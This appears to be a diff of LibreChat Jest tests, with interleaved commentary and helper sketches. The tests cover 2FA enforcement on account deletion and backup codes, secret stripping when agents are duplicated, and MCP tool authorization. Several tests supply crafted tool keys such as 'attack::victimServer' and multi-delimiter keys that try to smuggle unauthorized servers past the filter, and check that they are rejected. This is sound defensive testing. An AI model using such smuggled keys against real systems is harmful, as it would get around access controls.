expect(mockVerifyOTPOrBackupCode).toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(200);
expect(res.json).toHaveBeenCalledWith({
backupCodes: PLAIN_CODES,
backupCodesHash: CODE_OBJECTS,
});
});
it('returns error when no token provided and 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 });
await regenerateBackupCodes(req, res);
expect(res.status).toHaveBeenCalledWith(400);
});
it('returns 401 when invalid token provided and 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: { token: 'wrong' } };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({
verified: false,
status: 401,
message: 'Invalid token or backup code',
});
await regenerateBackupCodes(req, res);
expect(res.status).toHaveBeenCalledWith(401);
expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' });
});
it('includes backupCodesHash in response', async () => {
const req = { user: { id: 'user1' }, body: { token: '123456' } };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
mockUpdateUser.mockResolvedValue({});
await regenerateBackupCodes(req, res);
const responseBody = res.json.mock.calls[0][0];
expect(responseBody).toHaveProperty('backupCodesHash', CODE_OBJECTS);
expect(responseBody).toHaveProperty('backupCodes', PLAIN_CODES);
});
it('allows regeneration without token when 2FA is not enabled', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: false,
});
mockUpdateUser.mockResolvedValue({});
await regenerateBackupCodes(req, res);
expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(200);
expect(res.json).toHaveBeenCalledWith({
backupCodes: PLAIN_CODES,
backupCodesHash: CODE_OBJECTS,
});
});
});
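The suite above drives `regenerateBackupCodes` through the `verifyOTPOrBackupCode` result shape (`{ verified, status?, message? }`). A minimal, hypothetical sketch of how a controller can map that result onto an HTTP response; the helper name and default status are assumptions, not LibreChat's actual implementation:

```javascript
// Hypothetical helper: translate a verifyOTPOrBackupCode result into an
// HTTP response descriptor, as exercised by the tests above.
function toHttpResponse(result) {
  if (result.verified) {
    return { status: 200 };
  }
  // Unverified: propagate the service's status (400 for missing input,
  // 401 for a bad token/backup code); 400 is an assumed fallback.
  return { status: result.status ?? 400, body: { message: result.message } };
}
```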


@ -0,0 +1,302 @@
const mockGetUserById = jest.fn();
const mockDeleteMessages = jest.fn();
const mockDeleteAllUserSessions = jest.fn();
const mockDeleteUserById = jest.fn();
const mockDeleteAllSharedLinks = jest.fn();
const mockDeletePresets = jest.fn();
const mockDeleteUserKey = jest.fn();
const mockDeleteConvos = jest.fn();
const mockDeleteFiles = jest.fn();
const mockGetFiles = jest.fn();
const mockUpdateUserPlugins = jest.fn();
const mockUpdateUser = jest.fn();
const mockFindToken = jest.fn();
const mockVerifyOTPOrBackupCode = jest.fn();
const mockDeleteUserPluginAuth = jest.fn();
const mockProcessDeleteRequest = jest.fn();
const mockDeleteToolCalls = jest.fn();
const mockDeleteUserAgents = jest.fn();
const mockDeleteUserPrompts = jest.fn();
jest.mock('@librechat/data-schemas', () => ({
logger: { error: jest.fn(), info: jest.fn() },
webSearchKeys: [],
}));
jest.mock('librechat-data-provider', () => ({
Tools: {},
CacheKeys: {},
Constants: { mcp_delimiter: '::', mcp_prefix: 'mcp_' },
FileSources: {},
}));
jest.mock('@librechat/api', () => ({
MCPOAuthHandler: {},
MCPTokenStorage: {},
normalizeHttpError: jest.fn(),
extractWebSearchEnvVars: jest.fn(),
}));
jest.mock('~/models', () => ({
deleteAllUserSessions: (...args) => mockDeleteAllUserSessions(...args),
deleteAllSharedLinks: (...args) => mockDeleteAllSharedLinks(...args),
updateUserPlugins: (...args) => mockUpdateUserPlugins(...args),
deleteUserById: (...args) => mockDeleteUserById(...args),
deleteMessages: (...args) => mockDeleteMessages(...args),
deletePresets: (...args) => mockDeletePresets(...args),
deleteUserKey: (...args) => mockDeleteUserKey(...args),
getUserById: (...args) => mockGetUserById(...args),
deleteConvos: (...args) => mockDeleteConvos(...args),
deleteFiles: (...args) => mockDeleteFiles(...args),
updateUser: (...args) => mockUpdateUser(...args),
findToken: (...args) => mockFindToken(...args),
getFiles: (...args) => mockGetFiles(...args),
}));
jest.mock('~/db/models', () => ({
ConversationTag: { deleteMany: jest.fn() },
AgentApiKey: { deleteMany: jest.fn() },
Transaction: { deleteMany: jest.fn() },
MemoryEntry: { deleteMany: jest.fn() },
Assistant: { deleteMany: jest.fn() },
AclEntry: { deleteMany: jest.fn() },
Balance: { deleteMany: jest.fn() },
Action: { deleteMany: jest.fn() },
Group: { updateMany: jest.fn() },
Token: { deleteMany: jest.fn() },
User: {},
}));
jest.mock('~/server/services/PluginService', () => ({
updateUserPluginAuth: jest.fn(),
deleteUserPluginAuth: (...args) => mockDeleteUserPluginAuth(...args),
}));
jest.mock('~/server/services/twoFactorService', () => ({
verifyOTPOrBackupCode: (...args) => mockVerifyOTPOrBackupCode(...args),
}));
jest.mock('~/server/services/AuthService', () => ({
verifyEmail: jest.fn(),
resendVerificationEmail: jest.fn(),
}));
jest.mock('~/config', () => ({
getMCPManager: jest.fn(),
getFlowStateManager: jest.fn(),
getMCPServersRegistry: jest.fn(),
}));
jest.mock('~/server/services/Config/getCachedTools', () => ({
invalidateCachedTools: jest.fn(),
}));
jest.mock('~/server/services/Files/S3/crud', () => ({
needsRefresh: jest.fn(),
getNewS3URL: jest.fn(),
}));
jest.mock('~/server/services/Files/process', () => ({
processDeleteRequest: (...args) => mockProcessDeleteRequest(...args),
}));
jest.mock('~/server/services/Config', () => ({
getAppConfig: jest.fn(),
}));
jest.mock('~/models/ToolCall', () => ({
deleteToolCalls: (...args) => mockDeleteToolCalls(...args),
}));
jest.mock('~/models/Prompt', () => ({
deleteUserPrompts: (...args) => mockDeleteUserPrompts(...args),
}));
jest.mock('~/models/Agent', () => ({
deleteUserAgents: (...args) => mockDeleteUserAgents(...args),
}));
jest.mock('~/cache', () => ({
getLogStores: jest.fn(),
}));
const { deleteUserController } = require('~/server/controllers/UserController');
function createRes() {
const res = {};
res.status = jest.fn().mockReturnValue(res);
res.json = jest.fn().mockReturnValue(res);
res.send = jest.fn().mockReturnValue(res);
return res;
}
function stubDeletionMocks() {
mockDeleteMessages.mockResolvedValue();
mockDeleteAllUserSessions.mockResolvedValue();
mockDeleteUserKey.mockResolvedValue();
mockDeletePresets.mockResolvedValue();
mockDeleteConvos.mockResolvedValue();
mockDeleteUserPluginAuth.mockResolvedValue();
mockDeleteUserById.mockResolvedValue();
mockDeleteAllSharedLinks.mockResolvedValue();
mockGetFiles.mockResolvedValue([]);
mockProcessDeleteRequest.mockResolvedValue();
mockDeleteFiles.mockResolvedValue();
mockDeleteToolCalls.mockResolvedValue();
mockDeleteUserAgents.mockResolvedValue();
mockDeleteUserPrompts.mockResolvedValue();
}
beforeEach(() => {
jest.clearAllMocks();
stubDeletionMocks();
});
describe('deleteUserController - 2FA enforcement', () => {
it('proceeds with deletion when 2FA is not enabled', async () => {
const req = { user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({ _id: 'user1', twoFactorEnabled: false });
await deleteUserController(req, res);
expect(res.status).toHaveBeenCalledWith(200);
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
expect(mockDeleteMessages).toHaveBeenCalled();
expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled();
});
it('proceeds with deletion when user has no 2FA record', async () => {
const req = { user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue(null);
await deleteUserController(req, res);
expect(res.status).toHaveBeenCalledWith(200);
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
});
it('returns error when 2FA is enabled and verification fails with 400', async () => {
const req = { user: { id: 'user1', _id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 });
await deleteUserController(req, res);
expect(res.status).toHaveBeenCalledWith(400);
expect(mockDeleteMessages).not.toHaveBeenCalled();
});
it('returns 401 when 2FA is enabled and invalid TOTP token provided', async () => {
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
};
const req = { user: { id: 'user1', _id: 'user1' }, body: { token: 'wrong' } };
const res = createRes();
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({
verified: false,
status: 401,
message: 'Invalid token or backup code',
});
await deleteUserController(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: 'wrong',
backupCode: undefined,
});
expect(res.status).toHaveBeenCalledWith(401);
expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' });
expect(mockDeleteMessages).not.toHaveBeenCalled();
});
it('returns 401 when 2FA is enabled and invalid backup code provided', async () => {
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
backupCodes: [],
};
const req = { user: { id: 'user1', _id: 'user1' }, body: { backupCode: 'bad-code' } };
const res = createRes();
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({
verified: false,
status: 401,
message: 'Invalid token or backup code',
});
await deleteUserController(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: undefined,
backupCode: 'bad-code',
});
expect(res.status).toHaveBeenCalledWith(401);
expect(mockDeleteMessages).not.toHaveBeenCalled();
});
it('deletes account when valid TOTP token provided with 2FA enabled', async () => {
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
};
const req = {
user: { id: 'user1', _id: 'user1', email: 'a@b.com' },
body: { token: '123456' },
};
const res = createRes();
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
await deleteUserController(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: '123456',
backupCode: undefined,
});
expect(res.status).toHaveBeenCalledWith(200);
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
expect(mockDeleteMessages).toHaveBeenCalled();
});
it('deletes account when valid backup code provided with 2FA enabled', async () => {
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
backupCodes: [{ codeHash: 'h1', used: false }],
};
const req = {
user: { id: 'user1', _id: 'user1', email: 'a@b.com' },
body: { backupCode: 'valid-code' },
};
const res = createRes();
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
await deleteUserController(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: undefined,
backupCode: 'valid-code',
});
expect(res.status).toHaveBeenCalledWith(200);
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
expect(mockDeleteMessages).toHaveBeenCalled();
});
});


@ -0,0 +1,159 @@
jest.mock('~/server/services/PermissionService', () => ({
findPubliclyAccessibleResources: jest.fn(),
findAccessibleResources: jest.fn(),
hasPublicPermission: jest.fn(),
grantPermission: jest.fn().mockResolvedValue({}),
}));
jest.mock('~/server/services/Config', () => ({
getCachedTools: jest.fn(),
getMCPServerTools: jest.fn(),
}));
const mongoose = require('mongoose');
const { actionDelimiter } = require('librechat-data-provider');
const { agentSchema, actionSchema } = require('@librechat/data-schemas');
const { MongoMemoryServer } = require('mongodb-memory-server');
const { duplicateAgent } = require('../v1');
let mongoServer;
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
const mongoUri = mongoServer.getUri();
if (!mongoose.models.Agent) {
mongoose.model('Agent', agentSchema);
}
if (!mongoose.models.Action) {
mongoose.model('Action', actionSchema);
}
await mongoose.connect(mongoUri);
}, 20000);
afterAll(async () => {
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await mongoose.models.Agent.deleteMany({});
await mongoose.models.Action.deleteMany({});
});
describe('duplicateAgentHandler — action domain extraction', () => {
it('builds duplicated action entries using metadata.domain, not action_id', async () => {
const userId = new mongoose.Types.ObjectId();
const originalAgentId = `agent_original`;
const agent = await mongoose.models.Agent.create({
id: originalAgentId,
name: 'Test Agent',
author: userId.toString(),
provider: 'openai',
model: 'gpt-4',
tools: [],
actions: [`api.example.com${actionDelimiter}act_original`],
versions: [{ name: 'Test Agent', createdAt: new Date(), updatedAt: new Date() }],
});
await mongoose.models.Action.create({
user: userId,
action_id: 'act_original',
agent_id: originalAgentId,
metadata: { domain: 'api.example.com' },
});
const req = {
params: { id: agent.id },
user: { id: userId.toString() },
};
const res = {
status: jest.fn().mockReturnThis(),
json: jest.fn(),
};
await duplicateAgent(req, res);
expect(res.status).toHaveBeenCalledWith(201);
const { agent: newAgent, actions: newActions } = res.json.mock.calls[0][0];
expect(newAgent.id).not.toBe(originalAgentId);
expect(String(newAgent.author)).toBe(userId.toString());
expect(newActions).toHaveLength(1);
expect(newActions[0].metadata.domain).toBe('api.example.com');
expect(newActions[0].agent_id).toBe(newAgent.id);
for (const actionEntry of newAgent.actions) {
const [domain, actionId] = actionEntry.split(actionDelimiter);
expect(domain).toBe('api.example.com');
expect(actionId).toBeTruthy();
expect(actionId).not.toBe('act_original');
}
const allActions = await mongoose.models.Action.find({}).lean();
expect(allActions).toHaveLength(2);
const originalAction = allActions.find((a) => a.action_id === 'act_original');
expect(originalAction.agent_id).toBe(originalAgentId);
const duplicatedAction = allActions.find((a) => a.action_id !== 'act_original');
expect(duplicatedAction.agent_id).toBe(newAgent.id);
expect(duplicatedAction.metadata.domain).toBe('api.example.com');
});
it('strips sensitive metadata fields from duplicated actions', async () => {
const userId = new mongoose.Types.ObjectId();
const originalAgentId = 'agent_sensitive';
await mongoose.models.Agent.create({
id: originalAgentId,
name: 'Sensitive Agent',
author: userId.toString(),
provider: 'openai',
model: 'gpt-4',
tools: [],
actions: [`secure.api.com${actionDelimiter}act_secret`],
versions: [{ name: 'Sensitive Agent', createdAt: new Date(), updatedAt: new Date() }],
});
await mongoose.models.Action.create({
user: userId,
action_id: 'act_secret',
agent_id: originalAgentId,
metadata: {
domain: 'secure.api.com',
api_key: 'sk-secret-key-12345',
oauth_client_id: 'client_id_xyz',
oauth_client_secret: 'client_secret_xyz',
},
});
const req = {
params: { id: originalAgentId },
user: { id: userId.toString() },
};
const res = {
status: jest.fn().mockReturnThis(),
json: jest.fn(),
};
await duplicateAgent(req, res);
expect(res.status).toHaveBeenCalledWith(201);
const duplicatedAction = await mongoose.models.Action.findOne({
agent_id: { $ne: originalAgentId },
}).lean();
expect(duplicatedAction.metadata.domain).toBe('secure.api.com');
expect(duplicatedAction.metadata.api_key).toBeUndefined();
expect(duplicatedAction.metadata.oauth_client_id).toBeUndefined();
expect(duplicatedAction.metadata.oauth_client_secret).toBeUndefined();
const originalAction = await mongoose.models.Action.findOne({
action_id: 'act_secret',
}).lean();
expect(originalAction.metadata.api_key).toBe('sk-secret-key-12345');
});
});
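The duplication tests above assert that credentials are dropped while `metadata.domain` survives. One way this stripping could be sketched; the field list is taken from the test fixtures, while the function name and shallow-copy approach are assumptions:

```javascript
// Fields treated as sensitive in the test fixtures above.
const SENSITIVE_FIELDS = ['api_key', 'oauth_client_id', 'oauth_client_secret'];

// Hypothetical sketch: return a copy of action metadata with credential
// fields removed, leaving non-sensitive fields such as `domain` intact.
function sanitizeActionMetadata(metadata) {
  const clean = { ...metadata };
  for (const field of SENSITIVE_FIELDS) {
    delete clean[field];
  }
  return clean;
}
```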


@ -44,6 +44,7 @@ const {
  isEphemeralAgentId,
  removeNullishValues,
} = require('librechat-data-provider');
const { filterFilesByAgentAccess } = require('~/server/services/Files/permissions');
const { spendTokens, spendStructuredTokens } = require('~/models/spendTokens');
const { encodeAndFormat } = require('~/server/services/Files/images/encode');
const { updateBalance, bulkInsertTransactions } = require('~/models');
@ -479,6 +480,7 @@ class AgentClient extends BaseClient {
        getUserKeyValues: db.getUserKeyValues,
        getToolFilesByIds: db.getToolFilesByIds,
        getCodeGeneratedFiles: db.getCodeGeneratedFiles,
        filterFilesByAgentAccess,
      },
    );
@ -1172,7 +1174,11 @@ class AgentClient extends BaseClient {
    }
  }

  /** Anthropic Claude models use a distinct BPE tokenizer; all others default to o200k_base. */
  getEncoding() {
    if (this.model && this.model.toLowerCase().includes('claude')) {
      return 'claude';
    }
    return 'o200k_base';
  }
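The `getEncoding` branch added in this diff can be restated as a standalone function; this is an illustrative restatement of the shown logic, not the class method itself:

```javascript
// Mirror of the diff's getEncoding logic: Claude models get the 'claude'
// tokenizer; every other model (or a missing model) falls back to o200k_base.
function getEncodingFor(model) {
  if (model && model.toLowerCase().includes('claude')) {
    return 'claude';
  }
  return 'o200k_base';
}
```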


@ -0,0 +1,677 @@
const mongoose = require('mongoose');
const { v4: uuidv4 } = require('uuid');
const { Constants } = require('librechat-data-provider');
const { agentSchema } = require('@librechat/data-schemas');
const { MongoMemoryServer } = require('mongodb-memory-server');
const d = Constants.mcp_delimiter;
const mockGetAllServerConfigs = jest.fn();
jest.mock('~/server/services/Config', () => ({
getCachedTools: jest.fn().mockResolvedValue({
web_search: true,
execute_code: true,
file_search: true,
}),
}));
jest.mock('~/config', () => ({
getMCPServersRegistry: jest.fn(() => ({
getAllServerConfigs: mockGetAllServerConfigs,
})),
}));
jest.mock('~/models/Project', () => ({
getProjectByName: jest.fn().mockResolvedValue(null),
}));
jest.mock('~/server/services/Files/strategies', () => ({
getStrategyFunctions: jest.fn(),
}));
jest.mock('~/server/services/Files/images/avatar', () => ({
resizeAvatar: jest.fn(),
}));
jest.mock('~/server/services/Files/S3/crud', () => ({
refreshS3Url: jest.fn(),
}));
jest.mock('~/server/services/Files/process', () => ({
filterFile: jest.fn(),
}));
jest.mock('~/models/Action', () => ({
updateAction: jest.fn(),
getActions: jest.fn().mockResolvedValue([]),
}));
jest.mock('~/models/File', () => ({
deleteFileByFilter: jest.fn(),
}));
jest.mock('~/server/services/PermissionService', () => ({
findAccessibleResources: jest.fn().mockResolvedValue([]),
findPubliclyAccessibleResources: jest.fn().mockResolvedValue([]),
grantPermission: jest.fn(),
hasPublicPermission: jest.fn().mockResolvedValue(false),
checkPermission: jest.fn().mockResolvedValue(true),
}));
jest.mock('~/models', () => ({
getCategoriesWithCounts: jest.fn(),
}));
jest.mock('~/cache', () => ({
getLogStores: jest.fn(() => ({
get: jest.fn(),
set: jest.fn(),
delete: jest.fn(),
})),
}));
const {
filterAuthorizedTools,
createAgent: createAgentHandler,
updateAgent: updateAgentHandler,
duplicateAgent: duplicateAgentHandler,
revertAgentVersion: revertAgentVersionHandler,
} = require('./v1');
const { getMCPServersRegistry } = require('~/config');
let Agent;
describe('MCP Tool Authorization', () => {
let mongoServer;
let mockReq;
let mockRes;
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
const mongoUri = mongoServer.getUri();
await mongoose.connect(mongoUri);
Agent = mongoose.models.Agent || mongoose.model('Agent', agentSchema);
}, 20000);
afterAll(async () => {
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await Agent.deleteMany({});
jest.clearAllMocks();
getMCPServersRegistry.mockImplementation(() => ({
getAllServerConfigs: mockGetAllServerConfigs,
}));
mockGetAllServerConfigs.mockResolvedValue({
authorizedServer: { type: 'sse', url: 'https://authorized.example.com' },
anotherServer: { type: 'sse', url: 'https://another.example.com' },
});
mockReq = {
user: {
id: new mongoose.Types.ObjectId().toString(),
role: 'USER',
},
body: {},
params: {},
query: {},
app: { locals: { fileStrategy: 'local' } },
};
mockRes = {
status: jest.fn().mockReturnThis(),
json: jest.fn().mockReturnThis(),
};
});
describe('filterAuthorizedTools', () => {
const availableTools = { web_search: true, custom_tool: true };
const userId = 'test-user-123';
test('should keep authorized MCP tools and strip unauthorized ones', async () => {
const result = await filterAuthorizedTools({
tools: [`toolA${d}authorizedServer`, `toolB${d}forbiddenServer`, 'web_search'],
userId,
availableTools,
});
expect(result).toContain(`toolA${d}authorizedServer`);
expect(result).toContain('web_search');
expect(result).not.toContain(`toolB${d}forbiddenServer`);
});
test('should keep system tools without querying MCP registry', async () => {
const result = await filterAuthorizedTools({
tools: ['execute_code', 'file_search', 'web_search'],
userId,
availableTools: {},
});
expect(result).toEqual(['execute_code', 'file_search', 'web_search']);
expect(mockGetAllServerConfigs).not.toHaveBeenCalled();
});
test('should not query MCP registry when no MCP tools are present', async () => {
const result = await filterAuthorizedTools({
tools: ['web_search', 'custom_tool'],
userId,
availableTools,
});
expect(result).toEqual(['web_search', 'custom_tool']);
expect(mockGetAllServerConfigs).not.toHaveBeenCalled();
});
test('should filter all MCP tools when registry is uninitialized', async () => {
getMCPServersRegistry.mockImplementation(() => {
throw new Error('MCPServersRegistry has not been initialized.');
});
const result = await filterAuthorizedTools({
tools: [`toolA${d}someServer`, 'web_search'],
userId,
availableTools,
});
expect(result).toEqual(['web_search']);
expect(result).not.toContain(`toolA${d}someServer`);
});
test('should handle mixed authorized and unauthorized MCP tools', async () => {
const result = await filterAuthorizedTools({
tools: [
'web_search',
`search${d}authorizedServer`,
`attack${d}victimServer`,
'execute_code',
`list${d}anotherServer`,
`steal${d}nonexistent`,
],
userId,
availableTools,
});
expect(result).toEqual([
'web_search',
`search${d}authorizedServer`,
'execute_code',
`list${d}anotherServer`,
]);
});
test('should handle empty tools array', async () => {
const result = await filterAuthorizedTools({
tools: [],
userId,
availableTools,
});
expect(result).toEqual([]);
expect(mockGetAllServerConfigs).not.toHaveBeenCalled();
});
test('should handle null/undefined tool entries gracefully', async () => {
const result = await filterAuthorizedTools({
tools: [null, undefined, '', 'web_search'],
userId,
availableTools,
});
expect(result).toEqual(['web_search']);
});
test('should call getAllServerConfigs with the correct userId', async () => {
await filterAuthorizedTools({
tools: [`tool${d}authorizedServer`],
userId: 'specific-user-id',
availableTools,
});
expect(mockGetAllServerConfigs).toHaveBeenCalledWith('specific-user-id');
});
test('should only call getAllServerConfigs once even with multiple MCP tools', async () => {
await filterAuthorizedTools({
tools: [`tool1${d}authorizedServer`, `tool2${d}anotherServer`, `tool3${d}unknownServer`],
userId,
availableTools,
});
expect(mockGetAllServerConfigs).toHaveBeenCalledTimes(1);
});
test('should preserve existing MCP tools when registry is unavailable', async () => {
getMCPServersRegistry.mockImplementation(() => {
throw new Error('MCPServersRegistry has not been initialized.');
});
const existingTools = [`toolA${d}serverA`, `toolB${d}serverB`];
const result = await filterAuthorizedTools({
tools: [...existingTools, `newTool${d}unknownServer`, 'web_search'],
userId,
availableTools,
existingTools,
});
expect(result).toContain(`toolA${d}serverA`);
expect(result).toContain(`toolB${d}serverB`);
expect(result).toContain('web_search');
expect(result).not.toContain(`newTool${d}unknownServer`);
});
test('should still reject all MCP tools when registry is unavailable and no existingTools', async () => {
getMCPServersRegistry.mockImplementation(() => {
throw new Error('MCPServersRegistry has not been initialized.');
});
const result = await filterAuthorizedTools({
tools: [`toolA${d}serverA`, 'web_search'],
userId,
availableTools,
});
expect(result).toEqual(['web_search']);
});
test('should not preserve malformed existing tools when registry is unavailable', async () => {
getMCPServersRegistry.mockImplementation(() => {
throw new Error('MCPServersRegistry has not been initialized.');
});
const malformedTool = `a${d}b${d}c`;
const result = await filterAuthorizedTools({
tools: [malformedTool, `legit${d}serverA`, 'web_search'],
userId,
availableTools,
existingTools: [malformedTool, `legit${d}serverA`],
});
expect(result).toContain(`legit${d}serverA`);
expect(result).toContain('web_search');
expect(result).not.toContain(malformedTool);
});
test('should reject malformed MCP tool keys with multiple delimiters', async () => {
const result = await filterAuthorizedTools({
tools: [
`attack${d}victimServer${d}authorizedServer`,
`legit${d}authorizedServer`,
`a${d}b${d}c${d}d`,
'web_search',
],
userId,
availableTools,
});
expect(result).toEqual([`legit${d}authorizedServer`, 'web_search']);
expect(result).not.toContainEqual(expect.stringContaining('victimServer'));
expect(result).not.toContainEqual(expect.stringContaining(`a${d}b`));
});
});
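The cases above pin down the per-key authorization contract: a valid MCP tool key is exactly `toolName` + delimiter + `serverName`, and keys with extra delimiters are rejected outright. A hedged sketch of such a check, with the delimiter value and function name assumed for illustration:

```javascript
// Assumed delimiter value ('::' per the mocked Constants.mcp_delimiter above).
const MCP_DELIMITER = '::';

// Hypothetical per-key check: split on the delimiter, reject anything that is
// not exactly toolName::serverName, then require the server to be authorized.
function isAuthorizedMCPTool(toolKey, authorizedServers) {
  const parts = toolKey.split(MCP_DELIMITER);
  if (parts.length !== 2) {
    return false; // malformed keys like `a::b::c` are always rejected
  }
  return authorizedServers.has(parts[1]);
}
```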
describe('createAgentHandler - MCP tool authorization', () => {
test('should strip unauthorized MCP tools on create', async () => {
mockReq.body = {
provider: 'openai',
model: 'gpt-4',
name: 'MCP Test Agent',
tools: ['web_search', `validTool${d}authorizedServer`, `attack${d}forbiddenServer`],
};
await createAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(201);
const agent = mockRes.json.mock.calls[0][0];
expect(agent.tools).toContain('web_search');
expect(agent.tools).toContain(`validTool${d}authorizedServer`);
expect(agent.tools).not.toContain(`attack${d}forbiddenServer`);
});
test('should not 500 when MCP registry is uninitialized', async () => {
getMCPServersRegistry.mockImplementation(() => {
throw new Error('MCPServersRegistry has not been initialized.');
});
mockReq.body = {
provider: 'openai',
model: 'gpt-4',
name: 'MCP Uninitialized Test',
tools: [`tool${d}someServer`, 'web_search'],
};
await createAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(201);
const agent = mockRes.json.mock.calls[0][0];
expect(agent.tools).toEqual(['web_search']);
});
test('should store mcpServerNames only for authorized servers', async () => {
mockReq.body = {
provider: 'openai',
model: 'gpt-4',
name: 'MCP Names Test',
tools: [`toolA${d}authorizedServer`, `toolB${d}forbiddenServer`],
};
await createAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(201);
const agent = mockRes.json.mock.calls[0][0];
const agentInDb = await Agent.findOne({ id: agent.id });
expect(agentInDb.mcpServerNames).toContain('authorizedServer');
expect(agentInDb.mcpServerNames).not.toContain('forbiddenServer');
});
});
describe('updateAgentHandler - MCP tool authorization', () => {
let existingAgentId;
let existingAgentAuthorId;
beforeEach(async () => {
existingAgentAuthorId = new mongoose.Types.ObjectId();
const agent = await Agent.create({
id: `agent_${uuidv4()}`,
name: 'Original Agent',
provider: 'openai',
model: 'gpt-4',
author: existingAgentAuthorId,
tools: ['web_search', `existingTool${d}authorizedServer`],
mcpServerNames: ['authorizedServer'],
versions: [
{
name: 'Original Agent',
provider: 'openai',
model: 'gpt-4',
tools: ['web_search', `existingTool${d}authorizedServer`],
createdAt: new Date(),
updatedAt: new Date(),
},
],
});
existingAgentId = agent.id;
});
test('should preserve existing MCP tools even if editor lacks access', async () => {
mockGetAllServerConfigs.mockResolvedValue({});
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = {
tools: ['web_search', `existingTool${d}authorizedServer`],
};
await updateAgentHandler(mockReq, mockRes);
expect(mockRes.json).toHaveBeenCalled();
const updatedAgent = mockRes.json.mock.calls[0][0];
expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`);
expect(updatedAgent.tools).toContain('web_search');
});
test('should reject newly added unauthorized MCP tools', async () => {
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = {
tools: ['web_search', `existingTool${d}authorizedServer`, `attack${d}forbiddenServer`],
};
await updateAgentHandler(mockReq, mockRes);
expect(mockRes.json).toHaveBeenCalled();
const updatedAgent = mockRes.json.mock.calls[0][0];
expect(updatedAgent.tools).toContain('web_search');
expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`);
expect(updatedAgent.tools).not.toContain(`attack${d}forbiddenServer`);
});
test('should allow adding authorized MCP tools', async () => {
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = {
tools: ['web_search', `existingTool${d}authorizedServer`, `newTool${d}anotherServer`],
};
await updateAgentHandler(mockReq, mockRes);
expect(mockRes.json).toHaveBeenCalled();
const updatedAgent = mockRes.json.mock.calls[0][0];
expect(updatedAgent.tools).toContain(`newTool${d}anotherServer`);
});
test('should not query MCP registry when no new MCP tools added', async () => {
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = {
tools: ['web_search', `existingTool${d}authorizedServer`],
};
await updateAgentHandler(mockReq, mockRes);
expect(mockGetAllServerConfigs).not.toHaveBeenCalled();
});
test('should preserve existing MCP tools when registry unavailable and user edits agent', async () => {
getMCPServersRegistry.mockImplementation(() => {
throw new Error('MCPServersRegistry has not been initialized.');
});
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = {
name: 'Renamed After Restart',
tools: ['web_search', `existingTool${d}authorizedServer`],
};
await updateAgentHandler(mockReq, mockRes);
expect(mockRes.json).toHaveBeenCalled();
const updatedAgent = mockRes.json.mock.calls[0][0];
expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`);
expect(updatedAgent.tools).toContain('web_search');
expect(updatedAgent.name).toBe('Renamed After Restart');
});
